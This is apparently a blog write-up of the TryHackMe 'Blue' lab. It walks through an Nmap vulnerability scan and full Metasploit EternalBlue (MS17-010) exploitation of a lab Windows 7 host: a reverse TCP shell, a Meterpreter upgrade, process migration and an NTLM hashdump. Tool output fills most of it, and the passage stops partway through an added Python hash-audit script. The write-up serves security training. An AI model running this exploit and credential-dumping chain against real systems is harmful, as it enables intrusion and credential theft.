Lately I've been hooked on TryHackMe, a service that provides hacking environments (for lack of a better word). Actually, I had been writing my writeups in English somewhere else all along.
But when I thought about it, I realized that writing in English has the hopeless (dumb) problem that when I look back I can't immediately tell what I wrote, so I figured I'd write in Japanese once in a while. It makes for blog material too.
If you're curious about TryHackMe, take a look here.
This time's theme is this one.
It's a beginner room that anyone who recognizes the name can solve on the spot. Incidentally, Hack The Box has a machine with the same name; it's pretty much the same.
To save effort and avoid spoilers, I won't write down the answers to the questions.
Scanning with Nmap
Initial scan
I always forget, but I think saving the results to a file (the -oN option) is important.
# Nmap 7.91 scan initiated Mon Nov 23 10:53:38 2020 as: nmap -sV -vv -oN initial.nmap --script vuln 10.10.176.20
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.176.20
Host is up, received conn-refused (0.40s latency).
Scanned at 2020-11-23 10:54:14 JST for 139s
Not shown: 991 closed ports
Reason: 991 conn-refused
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49160/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 23 10:56:33 2020 -- 1 IP address (1 host up) scanned in 174.87 seconds
Port 445 (SMB) is open, and the scan finds the MS17-010 vulnerability. Feels a bit nostalgic now. Youngsters who don't know it, go ask your seniors.
The exploit tooling for the MS17-010 vulnerability goes by the collective name EternalBlue; it was used by the WannaCry ransomware and was everywhere in 2017.
I was selling antivirus software at the time, so it was a boom for us (oops, old-timer move).
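As an added example (mine, not part of the original writeup), here is a small Python script that reads an Nmap -oN report produced with --script vuln, like the one above, pulls out every finding whose State is VULNERABLE together with its CVE IDs and risk factor, and sorts them worst first. That is the triage a defender does with the same scan: the MS17-010 and MS12-020 RCE items rise to the top, the DoS-only item drops below them. The embedded report is a constructed, re-indented excerpt of the scan shown above, so the script runs offline; the Finding class and function names are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in the shape of the `nmap --script vuln -oN` report above.
# It is trimmed and re-indented by hand, not a verbatim copy of the scan.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.176.20
PORT     STATE SERVICE            REASON  VERSION
445/tcp  open  microsoft-ds       syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ssl/ms-wbt-server? syn-ack
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|_
|_ssl-ccs-injection: No reply from server (TIMEOUT)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_
"""


@dataclass
class Finding:
    port: str                 # "445/tcp", or "host" for host-script results
    script: str               # NSE script that reported it
    title: str
    cves: list = field(default_factory=list)
    risk: str = ""            # HIGH / MEDIUM / LOW as printed by the script


PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+open\b")
SCRIPT_RE = re.compile(r"^([a-z0-9-]+):")   # NSE script names are lowercase-with-hyphens
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
# Field labels and URLs that must never be mistaken for a finding title.
SKIP_PREFIXES = ("VULNERABLE:", "NOT VULNERABLE:", "References:", "Disclosure date:",
                 "Check results:", "Extra information:", "Description:", "http")


def parse_vuln_report(text):
    """Walk an -oN report line by line and collect every State: VULNERABLE block."""
    findings, port, script, title, current = [], None, None, None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.startswith("|"):
            # Outside script output: track which port (or host section) we are in.
            m = PORT_RE.match(line)
            if m:
                port, script, current = m.group(1), None, None
            elif line.startswith("Host script results"):
                port, script, current = "host", None, None
            continue
        content = line.lstrip("|_ \t")
        if not content or content.startswith(SKIP_PREFIXES):
            continue
        if (m := re.match(r"State:\s*(.+)", content)):
            state = m.group(1).strip().upper()
            if "VULNERABLE" in state and not state.startswith("NOT"):
                current = Finding(port or "?", script or "?", title or "?")
                findings.append(current)
            else:
                current = None
        elif (m := re.match(r"IDs:\s*(.*)", content)):
            if current:
                current.cves.extend(CVE_RE.findall(m.group(1)))
        elif (m := re.match(r"Risk factor:\s*(\w+)", content)):
            if current:
                current.risk = m.group(1).upper()
        elif (m := SCRIPT_RE.match(content)):
            script, title, current = m.group(1), None, None   # new script block begins
        else:
            title = content   # most recent free-text line: the title when a State: line follows
    return findings


RISK_ORDER = {"HIGH": 3, "MEDIUM": 2, "LOW": 1}


def triage(findings):
    """Worst first; the sort is stable, so equal risks keep report order."""
    return sorted(findings, key=lambda f: RISK_ORDER.get(f.risk, 0), reverse=True)


if __name__ == "__main__":
    for f in triage(parse_vuln_report(SAMPLE_REPORT)):
        print(f"{f.risk:<6} {f.port:<9} {f.script:<20} {', '.join(f.cves) or '-'}  {f.title}")
```

Point the same parser at the initial.nmap file the -oN option wrote and you get a ranked list instead of scrolling through the raw script output; scripts that only report "false" or NT_STATUS_ACCESS_DENIED produce no finding at all.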
Getting in with Metasploit
Starting Metasploit
nmz@kali:~/THM/Blue$ msfconsole
=[ metasploit v6.0.17-dev ]
+ -- --=[ 2076 exploits - 1124 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: View a module's description using info, or the enhanced version in your browser with info -d
As a beginner I'll just use Metasploit as-is. I imagine professionals hunt down or write their own PoCs.
Searching for the MS17-010 module
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
Number 2 looks usable.
Using number 2
msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >
It's telling me there's no payload configured; is that okay?
Checking the required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.11.19 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
Setting the options
RHOSTS is required, and I change LHOST to the address I'm actually using.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.176.20
RHOSTS => 10.10.176.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.4.20.231
LHOST => 10.4.20.231
Run
Personally I prefer exploit over run because it feels more like doing something (probably makes no difference).
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.4.20.231:4444
[*] 10.10.176.20:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.176.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.176.20:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 22 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
Huh. It failed.
So it really doesn't work without a payload.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
One more time.
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.4.20.231:4444
[*] 10.10.176.20:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.176.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.176.20:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.4.20.231:4444 -> 10.10.176.20:49415) at 2020-11-23 14:37:52 +0900
[+] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system
It failed partway through and I'm not sure why, but it succeeded in the end, so good enough!! (...)
Ctrl+Z to background the session and go back
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Privilege escalation
Upgrading the shell to a Meterpreter shell in Metasploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] 10.4.20.231:4444 -> 10.10.176.20:49415 (10.10.176.20)
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
Run again
msf6 post(multi/manage/shell_to_meterpreter) > exploit
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.4.20.231:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (175174 bytes) to 10.10.176.20
[*] Meterpreter session 2 opened (10.4.20.231:4433 -> 10.10.176.20:49421) at 2020-11-23 14:42:56 +0900
[*] Stopping exploit/multi/handler
There was no immediate reply, so for a moment I wasn't sure what had happened.
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] 10.4.20.231:4444 -> 10.10.176.20:49415 (10.10.176.20)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC 10.4.20.231:4433 -> 10.10.176.20:49421 (10.10.176.20)
msf6 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Doesn't matter, but I keep mixing up whether it's session or sessions.
Checking processes
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
356 564 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
432 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM
492 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM
564 556 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
612 556 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
620 604 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
660 604 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
708 612 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
716 612 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
724 612 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
832 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM
864 2564 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
900 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
948 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1016 660 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
1076 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1160 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1340 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1404 708 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1424 708 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
1480 708 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1616 708 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1944 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1984 2724 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2280 864 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
2372 1984 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2404 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2412 2280 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2460 708 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2504 564 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2564 708 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
2576 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2616 708 vds.exe x64 0 NT AUTHORITY\SYSTEM
Migration
Migrate to (move into) a process by specifying its PID
meterpreter > migrate -h
Usage: migrate <<pid> | -P <pid> | -N <name>> [-t timeout]
Migrates the server instance to another process.
NOTE: Any open channels or other dynamic state will be lost.
meterpreter > migrate -P 660
[*] Migrating from 2372 to 660...
[*] Migration completed successfully.
meterpreter >
Seems to have worked.
Password cracking
Running hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Cracking Jon's password from the hash
Apparently you can do it in Metasploit too, but that's a hassle, so I used this site.
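Added example (not part of the original post): a short Python audit over pwdump-format lines like the hashdump output above, written from the defender's side of the same data. It flags accounts whose NT hash is the well-known hash of the empty string (a blank password), accounts that still have a real LM hash stored, and users that share a password (NT hashes are unsalted, so identical hashes mean identical passwords). The constants EMPTY_LM/EMPTY_NT are well-known values rather than anything from this page; the Account class and function names are mine; the three sample lines are the ones from the hashdump above.

```python
import re
from dataclasses import dataclass

# Well-known constants (not from this page): the LM and NT hashes of the
# empty string. An LM field equal to EMPTY_LM means no LM hash is stored
# (the default since Vista); an NT field equal to EMPTY_NT means the
# account's password is blank.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input in pwdump format (user:RID:LM:NT:::), the three lines from the
# hashdump output shown above.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


@dataclass
class Account:
    user: str
    rid: int
    lm: str   # stored lowercase
    nt: str   # stored lowercase

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        return self.lm != EMPTY_LM


def parse_pwdump(text):
    """Parse pwdump-style lines; rejects anything that is not user:RID:LM:NT:::."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = PWDUMP_RE.match(line)
        if not m:
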